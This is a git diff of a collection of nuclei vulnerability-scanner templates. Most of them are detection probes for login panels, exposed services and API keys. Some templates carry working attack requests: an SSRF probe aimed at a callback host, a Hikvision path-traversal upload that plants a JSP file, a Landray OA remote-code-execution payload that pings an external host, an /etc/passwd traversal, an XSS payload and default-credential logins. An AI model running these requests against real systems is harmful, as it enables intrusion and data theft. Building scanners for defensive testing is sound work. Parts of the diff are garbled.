Gecko/20100101 Firefox/68.0 - X-Forwarded-For: {{interactsh-url}} - Referer: {{BaseURL}}/?url={{interactsh-url}} - Connection: close - - | - GET / HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - X-Forwarded-For: {{interactsh-url}} - Referer: {{BaseURL}}/?url={{interactsh-url}} - True-Client-IP: {{interactsh-url}} - X-WAP-Profile: http://{{interactsh-url}}/wap.xml - Connection: close - - | - GET / HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - X-Forwarded-For: {{interactsh-url}} - Expect-Ct: max-age=6*6, report-uri="https://{{interactsh-url}}/expect-ct" - Connection: close - - | - GET /admin HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - X-Forwarded-For: {{interactsh-url}} - Connection: close - - | - POST /admin HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - X-Forwarded-To: {{interactsh-url}} - Connection: close - - | - GET /api/v1/;;/admin/ HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - X-Forwarded-For: {{interactsh-url}} - Connection: close - - | - GET /api/;;/admin/ HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - X-Forwarded-For: {{interactsh-url}} - Connection: close - - | - GET /api/v1/secrets HTTP/1.1 - Host: 127.0.0.1 - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - X-Forwarded-For: {{interactsh-url}} - Connection: close - - | - CONNECT {{interactsh-url}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - X-Forwarded-Host: {{interactsh-url}} - X-Forwarded-For: {{interactsh-url}} - - | - POST / HTTP/1.1 - Host: {{interactsh-url}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - X-Forwarded-For: {{interactsh-url}} - Connection: close - - | - HEAD / HTTP/1.1 - Host: {{interactsh-url}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - X-Forwarded-To: {{interactsh-url}} - Connection: close - - | - HEAD / HTTP/1.1 - Host: {{Hostname}} - Host: {{interactsh-url}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - - | - HEAD / HTTP/1.1 - Host: {{interactsh-url}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - - | - HEAD / HTTP/1.1 - Host: {{interactsh-url}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - - | - GET /stats HTTP/1.1 - Host: 127.0.0.1:9901 - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - - | - GET /services HTTP/1.1 - Host: 127.0.0.1:8001 - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - - | - GET /services HTTP/1.1 - Host: 127.0.0.1:8444 - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - redirects: true - matchers-condition: or - matchers: - - type: status - status: - - 200 - - 302 - - type: word - part: interactsh_protocol - words: - - "dns" - - "http" diff --git a/nuclei-templates/Other/Hikvision_iVMS-8700_Fileupload_report.yaml b/nuclei-templates/Other/Hikvision_iVMS-8700_Fileupload_report.yaml index e86e8491d1..cd961f6e81 100644 --- a/nuclei-templates/Other/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/nuclei-templates/Other/Hikvision_iVMS-8700_Fileupload_report.yaml @@ -1,40 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - raw: - - | - POST /svm/api/external/report HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> - - ------WebKitFormBoundary9PggsiM755PLa54a-- - - | - GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "data")' - - 'status_code_2 == 200' - - 'contains(body_2, "test")' - condition: and + - type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/IDOR-vuln-params.yaml b/nuclei-templates/Other/IDOR-vuln-params.yaml new file mode 100644 index 0000000000..0fb86dd535 --- /dev/null +++ b/nuclei-templates/Other/IDOR-vuln-params.yaml @@ -0,0 +1,16 @@ +id: idor-vuln-params + +info: + name: detect possible idor parameters + author: ayadim + severity: info + tags: file,bbh,bbh-idor,bbh-check1 + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "(?i)(\\?|\\&)(((([a-z0-9-_])+(-|_)+))|(-|_))?(id|uuid|user|account|number|order|no|doc|key|email|group|profile|edit|report|username)((=)|(\\/[0-9]+\\/?))" diff --git a/nuclei-templates/Other/JeeSite-default-login.yaml b/nuclei-templates/Other/JeeSite-default-login.yaml new file mode 100644 index 0000000000..43ad9321e7 --- /dev/null +++ b/nuclei-templates/Other/JeeSite-default-login.yaml @@ -0,0 +1,25 @@ +id: JeeSite-default-login +info: + name: JeeSite默认密码 + author: Str1am + severity: high + tags: JeeSite,login +requests: + - raw: + - | + POST /a/login HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + username=F3EDC7D2C193E0B8DCF554C726719ED2&password=235880C505ACCDA5C581A4F4CDB81DA0&validCode= + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "登录成功" + part: body + condition: and diff --git a/nuclei-templates/Other/Karel-ip-phone-lfi.yaml b/nuclei-templates/Other/Karel-ip-phone-lfi.yaml deleted file mode 100644 index cf9a777485..0000000000 --- a/nuclei-templates/Other/Karel-ip-phone-lfi.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: karel-ip-phone-lfi -info: - name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal - author: 0x_Akoko - severity: high - description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter. - reference: - - https://cxsecurity.com/issue/WLB-2020100038 - - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon - tags: karel,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd" - headers: - Authorization: Basic YWRtaW46YWRtaW4= - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/kingdee-file-list.yaml b/nuclei-templates/Other/Kingdee-file-list.yaml similarity index 100% rename from nuclei-templates/Other/kingdee-file-list.yaml rename to nuclei-templates/Other/Kingdee-file-list.yaml diff --git a/nuclei-templates/Other/kingsoft-v8-fileread.yaml b/nuclei-templates/Other/Kingsoft-v8-fileRead.yaml similarity index 100% rename from nuclei-templates/Other/kingsoft-v8-fileread.yaml rename to nuclei-templates/Other/Kingsoft-v8-fileRead.yaml diff --git a/nuclei-templates/Other/kubernetes-unauth.yaml b/nuclei-templates/Other/Kubernetes-unauth.yaml similarity index 100% rename from nuclei-templates/Other/kubernetes-unauth.yaml rename to nuclei-templates/Other/Kubernetes-unauth.yaml diff --git a/nuclei-templates/Other/Landray OA treexml.tmpl Script RCE.yaml b/nuclei-templates/Other/Landray OA treexml.tmpl Script RCE.yaml new file mode 100644 index 0000000000..2523c8afde --- /dev/null +++ b/nuclei-templates/Other/Landray OA treexml.tmpl Script RCE.yaml @@ -0,0 +1,46 @@ +id: landray-oa-treexml-rce + +info: + name: Landray OA Treexml.tmpl - Remote Code Execution + author: tangxiaofeng7,SleepingBag945 + severity: high + description: | + There is a remote command execution vulnerability in Lanling OA treexml.tmpl. An attacker can obtain server permissions by sending a specific request package. + reference: + - https://github.com/tangxiaofeng7/Landray-OA-Treexml-Rce/blob/main/landray-oa-treexml-rce.yaml + - https://vuls.info/PeiQi/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/#_4 + metadata: + verified: true + max-request: 1 + fofa-query: app="Landray-OA系统" + tags: landray,oa,treexml,rce + +http: + - raw: + - | + POST /data/sys-common/treexml.tmpl HTTP/1.1 + Host: {{Hostname}} + Pragma: no-cache + Content-Type: application/x-www-form-urlencoded + + s_bean=ruleFormulaValidate&script=try {String cmd = "ping {{interactsh-url}}";Process child = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - "" + - "" + condition: and + + - type: status + status: + - 200 + +# digest: 4b0a0048304602210096f0ba9e6a94142423797bf77a9ada7c90c4b3df0f7a5da5c7f3dca65655cee60221009eaf25bf39f22f5cc51eb59c17943967a388d54fe9aa843d341a6ef2af2af5ce:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/Mailgun-api.yaml b/nuclei-templates/Other/Mailgun-api.yaml deleted file mode 100644 index 5b84ad10f0..0000000000 --- a/nuclei-templates/Other/Mailgun-api.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: mailgun-api-key -info: - name: Mailgun API Key - author: gaurang - severity: high - tags: token,file,mailgun -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "key-[0-9a-zA-Z]{32}" diff --git a/nuclei-templates/Other/maticsoft-shop-sqli.yaml b/nuclei-templates/Other/Maticsoft-Shop-sqli.yaml similarity index 100% rename from nuclei-templates/Other/maticsoft-shop-sqli.yaml rename to nuclei-templates/Other/Maticsoft-Shop-sqli.yaml diff --git a/nuclei-templates/Other/MinIO-default-login.yaml b/nuclei-templates/Other/MinIO-default-login.yaml deleted file mode 100644 index 59a1baa030..0000000000 --- a/nuclei-templates/Other/MinIO-default-login.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: MinIO-default-login - -info: - name: MinIO 默认口令漏洞 - author: Str1am - severity: high - tags: MinIO,login - -requests: - - raw: - - | - POST /minio/webrpc HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 - - {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "uiVersion" - - "token" - part: body - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/Nsfocus_NF_Firewall_FileUpload.yaml b/nuclei-templates/Other/Nsfocus_sas_getFile_read.yaml similarity index 100% rename from nuclei-templates/Other/Nsfocus_NF_Firewall_FileUpload.yaml rename to nuclei-templates/Other/Nsfocus_sas_getFile_read.yaml diff --git a/nuclei-templates/Other/path-traversal.yaml b/nuclei-templates/Other/Path-Traversal.yaml similarity index 100% rename from nuclei-templates/Other/path-traversal.yaml rename to nuclei-templates/Other/Path-Traversal.yaml diff --git a/nuclei-templates/Other/paypal-braintree-token.yaml b/nuclei-templates/Other/Paypal-braintree-token.yaml similarity index 100% rename from nuclei-templates/Other/paypal-braintree-token.yaml rename to nuclei-templates/Other/Paypal-braintree-token.yaml diff --git a/nuclei-templates/Other/RedMine-Detect.yaml b/nuclei-templates/Other/RedMine-Detect.yaml deleted file mode 100644 index 27bbe96ec9..0000000000 --- a/nuclei-templates/Other/RedMine-Detect.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: RedMine-detect - -info: - name: RedMine Detection - author: YashVardhanTripathi - severity: info - description: RedMine Default Login Extraction - metadata: - max-request: 1 - tags: tech, RedMine - -requests: - - method: GET - path: - - "{{BaseURL}}/login" - extractors: - - type: regex - name: Coocoo - group: 1 - part: header - regex: - - "Redmine=([a-zA-Z0-9]+);" - - type: regex - name: authtok - group: 1 - part: body - regex: - - '" + - "AChecker - Copyright" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/achecker-detect-27.yaml b/nuclei-templates/Other/achecker-detect-27.yaml deleted file mode 100644 index dd940e3eeb..0000000000 --- a/nuclei-templates/Other/achecker-detect-27.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: achecker-detect - -info: - name: AChecker Detect - author: princechaddha - severity: info - tags: tech,achecker - -requests: - - method: GET - path: - - "{{BaseURL}}/checker/login.php" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - ": Web Accessibility Checker" - - "AChecker - Copyright" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/acme-xss-28.yaml b/nuclei-templates/Other/acme-xss-28.yaml index 06821bb4ae..3b4de118e0 100644 --- a/nuclei-templates/Other/acme-xss-28.yaml +++ b/nuclei-templates/Other/acme-xss-28.yaml @@ -1,13 +1,16 @@ id: acme-xss + info: name: ACME / Let's Encrypt Reflected XSS author: pdteam severity: medium tags: xss,acme + requests: - method: GET path: - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E' + matchers-condition: and matchers: - type: word diff --git a/nuclei-templates/Other/acquia-takeover-35.yaml b/nuclei-templates/Other/acquia-takeover-35.yaml deleted file mode 100644 index f47ad2c610..0000000000 --- a/nuclei-templates/Other/acquia-takeover-35.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: acquia-takeover - -info: - name: Acquia Takeover Detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - name: acquia - words: - - If you are an Acquia Cloud customer and expect to see your site at this address - - The site you are looking for could not be found. - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/acquia-takeover.yaml b/nuclei-templates/Other/acquia-takeover.yaml new file mode 100644 index 0000000000..fa267bacc3 --- /dev/null +++ b/nuclei-templates/Other/acquia-takeover.yaml @@ -0,0 +1,21 @@ +id: acquia-takeover + +info: + name: Acquia Takeover Detection + author: pdcommunity + severity: info + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + name: acquia + words: + - If you are an Acquia Cloud customer and expect to see your site at this address + - The site you are looking for could not be found. + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/active-admin-exposure-41.yaml b/nuclei-templates/Other/active-admin-exposure-41.yaml deleted file mode 100644 index ea5abea227..0000000000 --- a/nuclei-templates/Other/active-admin-exposure-41.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: active-admin-exposure - -info: - name: ActiveAdmin Admin Dasboard Exposure - author: pdteam - severity: info - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/admin/login' - matchers: - - type: word - words: - - "active_admin_content" - - "active_admin-" - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/active-admin-exposure.yaml b/nuclei-templates/Other/active-admin-exposure.yaml new file mode 100644 index 0000000000..f4bdf291e6 --- /dev/null +++ b/nuclei-templates/Other/active-admin-exposure.yaml @@ -0,0 +1,18 @@ +id: active-admin-exposure + +info: + name: ActiveAdmin Admin Dasboard Exposure + author: pdteam + severity: info + tags: panel,activeadmin + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/login' + matchers: + - type: word + words: + - "active_admin_content" + - "active_admin-" + condition: and diff --git a/nuclei-templates/Other/activemq-default-login-44.yaml b/nuclei-templates/Other/activemq-default-login-44.yaml new file mode 100644 index 0000000000..ae5ac0f72c --- /dev/null +++ b/nuclei-templates/Other/activemq-default-login-44.yaml @@ -0,0 +1,31 @@ +id: activemq-default-login +info: + name: Apache ActiveMQ Default Login + author: pdteam + severity: medium + description: Apache ActiveMQ default login information was discovered. + reference: + - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html + tags: apache,activemq,default-login +requests: + - raw: + - | + GET /admin/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + payloads: + username: + - user + - admin + password: + - user + - admin + attack: pitchfork + matchers: + - type: word + words: + - 'Welcome to the Apache ActiveMQ Console of ' + - '

    Broker

    ' + condition: and + +# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/Other/activemq-default-login.yaml b/nuclei-templates/Other/activemq-default-login.yaml deleted file mode 100644 index 682c7a251a..0000000000 --- a/nuclei-templates/Other/activemq-default-login.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: activemq-default-login -info: - name: Apache ActiveMQ Default Login - author: pdteam - severity: medium - description: Apache ActiveMQ default login information was discovered. - reference: https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html - tags: apache,activemq,default-login -requests: - - raw: - - | - GET /admin/ HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - payloads: - username: - - user - - admin - password: - - user - - admin - attack: pitchfork - matchers: - - type: word - words: - - 'Welcome to the Apache ActiveMQ Console of ' - - '

    Broker

    ' - condition: and - -# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/Other/activemq-panel-52.yaml b/nuclei-templates/Other/activemq-panel-52.yaml deleted file mode 100644 index a269d2dfe1..0000000000 --- a/nuclei-templates/Other/activemq-panel-52.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: activemq-panel - -info: - name: Apache ActiveMQ Exposure - author: pdteam - severity: info - tags: panel,activemq,apache - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers: - - type: word - words: - - '

    Welcome to the Apache ActiveMQ!

    ' - - 'Apache ActiveMQ' - condition: and diff --git a/nuclei-templates/Other/activemq-panel.yaml b/nuclei-templates/Other/activemq-panel.yaml new file mode 100644 index 0000000000..7f435fed9a --- /dev/null +++ b/nuclei-templates/Other/activemq-panel.yaml @@ -0,0 +1,26 @@ +id: activemq-panel + +info: + name: Apache ActiveMQ Exposure + author: pdteam + severity: info + description: An Apache ActiveMQ implementation was discovered. + reference: + - https://activemq.apache.org/ + classification: + cwe-id: CWE-200 + tags: panel,activemq,apache + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - '

    Welcome to the Apache ActiveMQ!

    ' + - 'Apache ActiveMQ' + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/acunetix-panel-58.yaml b/nuclei-templates/Other/acunetix-panel-58.yaml new file mode 100644 index 0000000000..bf7ce829d1 --- /dev/null +++ b/nuclei-templates/Other/acunetix-panel-58.yaml @@ -0,0 +1,23 @@ +id: acunetix-panel-detect + +info: + name: Acunetix Panel detector + author: joanbono + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/#/login" + + matchers-condition: and + matchers: + - type: word + words: + - 'Acunetix' + - '' + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/acunetix-panel.yaml b/nuclei-templates/Other/acunetix-panel.yaml deleted file mode 100644 index 4a0bcf6c89..0000000000 --- a/nuclei-templates/Other/acunetix-panel.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: acunetix-panel-detect - -info: - name: Acunetix Panel detector - author: joanbono - severity: info - tags: panel - -requests: - - method: GET - path: - - "{{BaseURL}}/#/login" - - matchers-condition: and - matchers: - - type: word - words: - - 'Acunetix' - - '' - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/ad-widget-lfi.yaml b/nuclei-templates/Other/ad-widget-lfi-124.yaml similarity index 100% rename from nuclei-templates/Other/ad-widget-lfi.yaml rename to nuclei-templates/Other/ad-widget-lfi-124.yaml diff --git a/nuclei-templates/Other/adb-backup-enabled-62.yaml b/nuclei-templates/Other/adb-backup-enabled-62.yaml deleted file mode 100644 index 5c756ded96..0000000000 --- a/nuclei-templates/Other/adb-backup-enabled-62.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: adb-backup-enabled - -info: - name: ADB Backup Enabled - author: gaurang - severity: low - description: ADB Backup is enabled, which allows the backup and restore of an app's private data. - reference: - - https://adb-backup.com/ - classification: - cwe-id: CWE-200 - remediation: Ensure proper access or disable completely. - tags: android,file - -file: - - extensions: - - all - matchers: - - type: word - words: - - "android:allowBackup=\"true\"" - -# Enhanced by mp on 2022/02/09 diff --git a/nuclei-templates/Other/adb-backup-enabled.yaml b/nuclei-templates/Other/adb-backup-enabled.yaml new file mode 100644 index 0000000000..7c0ecdd321 --- /dev/null +++ b/nuclei-templates/Other/adb-backup-enabled.yaml @@ -0,0 +1,23 @@ +id: adb-backup-enabled +info: + name: ADB Backup Enabled + description: ADB Backup is enabled, which allows the backup and restore of an app's private data. + remediation: Ensure proper access or disable completely. + author: gaurang + severity: low + tags: android,file + reference: + -https://adb-backup.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 +file: + - extensions: + - all + matchers: + - type: word + words: + - "android:allowBackup=\"true\"" + +# Enhanced by mp on 2022/02/09 diff --git a/nuclei-templates/Other/addeventlistener-detect-64.yaml b/nuclei-templates/Other/addeventlistener-detect-64.yaml new file mode 100644 index 0000000000..0b4b57ca9d --- /dev/null +++ b/nuclei-templates/Other/addeventlistener-detect-64.yaml @@ -0,0 +1,19 @@ +id: addeventlistener-detect + +info: + name: AddEventlistener detection + author: yavolo + severity: info + tags: xss + reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - 'window.addEventListener(' + part: body \ No newline at end of file diff --git a/nuclei-templates/Other/adiscon-loganalyzer-70.yaml b/nuclei-templates/Other/adiscon-loganalyzer-70.yaml new file mode 100644 index 0000000000..8c3441c865 --- /dev/null +++ b/nuclei-templates/Other/adiscon-loganalyzer-70.yaml @@ -0,0 +1,29 @@ +id: adiscon-loganalyzer +info: + name: Detect exposed Adiscon LogAnalyzer + author: geeknik + severity: high + description: Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing, analysis of realtime network events and reporting services. + reference: https://loganalyzer.adiscon.com/ + tags: adiscon,loganalyzer,syslog,exposures +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Adiscon LogAnalyzer' + - 'value="SYSLOG"' + - 'value="EVTRPT"' + - 'value="WEBLOG"' + condition: and + - type: status + status: + - 200 + - type: word + part: header + words: + - 'text/html' diff --git a/nuclei-templates/Other/adiscon-loganalyzer.yaml b/nuclei-templates/Other/adiscon-loganalyzer.yaml deleted file mode 100644 index 0a538c1c36..0000000000 --- a/nuclei-templates/Other/adiscon-loganalyzer.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: adiscon-loganalyzer -info: - name: Adiscon LogAnalyzer Detection - author: geeknik - severity: high - description: Adiscon LogAnalyzer was discovered. Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing and analysis of real-time network events and reporting services. - reference: - - https://loganalyzer.adiscon.com/ - classification: - cwe-id: CWE-200 - tags: adiscon,loganalyzer,syslog,exposures -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Adiscon LogAnalyzer' - - 'value="SYSLOG"' - - 'value="EVTRPT"' - - 'value="WEBLOG"' - condition: and - - type: status - status: - - 200 - - type: word - part: header - words: - - 'text/html' - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adminer-panel-75.yaml b/nuclei-templates/Other/adminer-panel-76.yaml similarity index 100% rename from nuclei-templates/Other/adminer-panel-75.yaml rename to nuclei-templates/Other/adminer-panel-76.yaml diff --git a/nuclei-templates/Other/adminer-panel-fuzz-72.yaml b/nuclei-templates/Other/adminer-panel-fuzz-72.yaml deleted file mode 100644 index 3de873c020..0000000000 --- a/nuclei-templates/Other/adminer-panel-fuzz-72.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: adminer-panel-fuzz -info: - name: Adminer Login Panel Fuzz - author: random_robbie,meme-lord - severity: info - reference: https://blog.sorcery.ie/posts/adminer/ - tags: fuzz,adminer,login - - # <= 4.2.4 can have unauthenticated RCE via SQLite driver - # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL - # Most versions have some kind of SSRF usability - # Is generally handy if you find SQL creds - -requests: - - - raw: - - | - GET {{path}} HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */* - Referer: {{BaseURL}} - - payloads: - path: helpers/wordlists/adminer-paths.txt - - threads: 50 - stop-at-first-match: true - matchers-condition: and - matchers: - - - type: word - condition: and - words: - - "- Adminer" - - "partial(verifyVersion" - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '([0-9.]+)' diff --git a/nuclei-templates/Other/adminer-panel-fuzz.yaml b/nuclei-templates/Other/adminer-panel-fuzz.yaml new file mode 100644 index 0000000000..9cfa2fa2db --- /dev/null +++ b/nuclei-templates/Other/adminer-panel-fuzz.yaml @@ -0,0 +1,39 @@ +id: adminer-panel-fuzz +info: + name: Adminer Login Panel Fuzz + author: random_robbie,meme-lord + severity: info + reference: + - https://blog.sorcery.ie/posts/adminer/ + tags: fuzz,adminer,login + # <= 4.2.4 can have unauthenticated RCE via SQLite driver + # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL + # Most versions have some kind of SSRF usability + # Is generally handy if you find SQL creds +requests: + - raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Referer: {{BaseURL}} + payloads: + path: helpers/wordlists/adminer-paths.txt + threads: 50 + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + condition: and + words: + - "- Adminer" + - "partial(verifyVersion" + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - '([0-9.]+)' diff --git a/nuclei-templates/Other/adminset-panel-78.yaml b/nuclei-templates/Other/adminset-panel-78.yaml deleted file mode 100644 index c539d29be5..0000000000 --- a/nuclei-templates/Other/adminset-panel-78.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: adminset-panel - -info: - name: Adminset Login Panel - author: ffffffff0x - severity: info - description: An Adminset login panel was detected. - classification: - cwe-id: CWE-200 - metadata: - fofa-query: app="AdminSet" - reference: - - https://github.com/guhongze/adminset/ - tags: adminset,panel - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "AdminSet Login" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adminset-panel-79.yaml b/nuclei-templates/Other/adminset-panel-79.yaml new file mode 100644 index 0000000000..3d5467849a --- /dev/null +++ b/nuclei-templates/Other/adminset-panel-79.yaml @@ -0,0 +1,37 @@ +id: adminset-panel + +info: + name: Adminset Login Panel + author: ffffffff0x + severity: info + description: An Adminset login panel was detected. + metadata: + fofa-query: app="AdminSet" + reference: + - https://github.com/guhongze/adminset/ + tags: adminset,panel + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "AdminSet Login" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adobe-coldfusion-detect-82.yaml b/nuclei-templates/Other/adobe-coldfusion-detect-82.yaml index 8bd7130d99..0d9330c87c 100644 --- 